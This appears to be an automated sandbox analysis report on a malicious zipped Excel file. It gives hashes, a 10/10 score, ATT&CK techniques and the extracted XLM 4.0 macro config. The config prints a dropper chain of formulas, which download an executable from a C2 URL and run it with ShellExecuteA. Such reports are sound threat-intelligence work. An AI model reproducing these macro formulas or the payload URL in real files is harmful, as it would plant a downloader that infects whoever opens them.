General

  • Target

    0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip

  • Size

    85KB

  • Sample

    230310-nl39dsfb5t

  • MD5

    846a85f7894f274965277103b41b3850

  • SHA1

    55d878269a78e1c4e3dc48b415adf77a8bcd2b49

  • SHA256

    cfb483de8ab7ff4bd338090a5991381e2bed527a1c026771fcaf03a101cf4afa

  • SHA512

    7da5fdf7123c5d9536165dc658c77a2e611826f11c413c6ee7b44a806ed0f094e4e33dae8f0251e35d46da0fe8fba7dc8f203fc0b7373ce6af2db5b2aea5e0cf

  • SSDEEP

    1536:GKgDB1ssb/C7ADrkM6Nkvsys2V7STuAkxiy92aJZFBLvMdBfJrTrzQT:WEs/CbNGVyuAkt92mFB4dBdQT

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Targets

    • Target

      0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.xlsx

    • Size

      94KB

    • MD5

      fb5ed444ddc37d748639f624397cff2a

    • SHA1

      3c1a4c0744203d2d08a23f4a9de10a1b593e7763

    • SHA256

      0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818

    • SHA512

      a62be2b995f835dda9fe86634986f6a2ae1f14cad5bb95590755ae9121cb2f83301cc52661a40c39ce4b9cf12aaed46084335779d10759d67d9153ba7404ad60

    • SSDEEP

      1536:+FOWzgGm5m839tLbt2M+hxICtyLKB9ibSZFeniz+IejsiiGcDUA:sz7mAyd2MLLKB9ib0reIZIA

    Score
    10/10

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks